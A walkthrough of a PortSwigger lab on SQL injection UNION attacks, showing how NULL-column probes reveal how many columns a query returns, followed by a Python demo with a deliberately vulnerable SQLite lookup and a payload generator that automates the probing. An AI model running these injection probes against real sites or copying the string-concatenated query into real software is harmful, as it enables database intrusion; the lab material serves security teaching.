SQL injection UNION attack, determining the number of columns returned by the query
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
Let's filter the product list by the Accessories category.
Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History tab to view the request that carries the category parameter.
Let's send this request to the Repeater for further modification.
Once in the Repeater, let's set the category parameter to a UNION SELECT probe that returns a single NULL column, closing the original string literal first and commenting out the rest of the original query.
Since the application returns an error, the two SELECTs joined by UNION have different numbers of columns, so the original query must return more than 1 column.
Let's try for two columns:
The application again returns an error.
Let's try for three columns:
The application no longer returns an error, which means the original query returns 3 columns.
We have solved the lab.
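The probing procedure above, as an added example that is not part of the original walkthrough or of PortSwigger's lab code. Instead of the lab's HTTP endpoint it uses a constructed in-memory SQLite table (the table name, columns and rows are assumptions for this demo) behind a deliberately vulnerable category lookup, so the same `' UNION SELECT NULL,...--` probes can be run offline and the column-count mismatch error stands in for the HTTP 500 the lab returns:

```python
import sqlite3
from typing import Optional


# Constructed stand-in for the lab's backend (not PortSwigger's code): a
# products table whose category filter selects three columns, so the probe
# should stop at n = 3. Table name, columns and rows are assumptions.
def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (name TEXT, description TEXT, price REAL, category TEXT)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [
            ("Pet Bag", "Constructed sample row", 12.50, "Accessories"),
            ("Lamp", "Constructed sample row", 30.00, "Lifestyle"),
        ],
    )
    return conn


def vulnerable_category_lookup(conn: sqlite3.Connection, category: str) -> list:
    # Deliberately vulnerable, mirroring the lab: the category parameter is
    # concatenated into the SQL string instead of being bound as a parameter.
    sql = (
        "SELECT name, description, price FROM products "
        f"WHERE category = '{category}'"
    )
    return conn.execute(sql).fetchall()


def union_null_payload(n: int) -> str:
    # Builds the probe for n columns, e.g. n=2 -> "' UNION SELECT NULL,NULL--".
    # NULL is used because it converts to every column type, so once the column
    # count matches the probe cannot still fail on a type mismatch. The leading
    # quote closes the category literal; the trailing -- comments out the
    # original closing quote. (On Oracle each SELECT needs a FROM clause, so the
    # probe there would end in FROM DUAL-- instead.)
    return "' UNION SELECT " + ",".join(["NULL"] * n) + "--"


def probe_causes_error(conn: sqlite3.Connection, payload: str) -> bool:
    # SQLite reports a UNION column-count mismatch as OperationalError; in the
    # lab the equivalent signal is the error response the application returns.
    try:
        vulnerable_category_lookup(conn, payload)
        return False
    except sqlite3.OperationalError:
        return True


def find_column_count(conn: sqlite3.Connection, max_cols: int = 20) -> Optional[int]:
    # Increase the NULL count until the injected UNION no longer errors; the
    # first n that succeeds is the number of columns the original query returns.
    for n in range(1, max_cols + 1):
        if not probe_causes_error(conn, union_null_payload(n)):
            return n
    return None


if __name__ == "__main__":
    db = make_demo_db()
    for n in range(1, 4):
        status = "error" if probe_causes_error(db, union_null_payload(n)) else "ok"
        print(f"{n} column(s): {status}")
    print("column count:", find_column_count(db))
```

Against the real lab the probe loop would send each payload in the category parameter through Burp (or a script) and treat a non-200 response the way `probe_causes_error` treats the SQLite exception; the payload builder is the only part that carries over unchanged.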